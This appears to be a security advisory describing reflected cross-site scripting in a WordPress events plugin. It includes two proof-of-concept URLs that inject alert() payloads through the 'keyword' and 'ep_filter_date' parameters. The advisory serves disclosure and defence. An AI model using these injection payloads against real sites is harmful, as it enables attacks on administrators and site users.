Description The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
POC 1 - Visit any of the following pages created by the plugin: - Event Organizers - Event Types - Performers - Venues Add the keyword
parameter to the URL with following text and load the new URL to trigger the XSS. E.g. https://example.com/event-types/?keyword="><img src=x onerror=alert(/XSS/)> -– POC 2 - Visit the following URL: https://example.com/wp-admin/edit.php?post_type=em_event&ep;_filter_date=2023-08-08"+onmouseover%3Dalert(%2FXSS%2F)+" Mouseover the date filter input to trigger the XSS.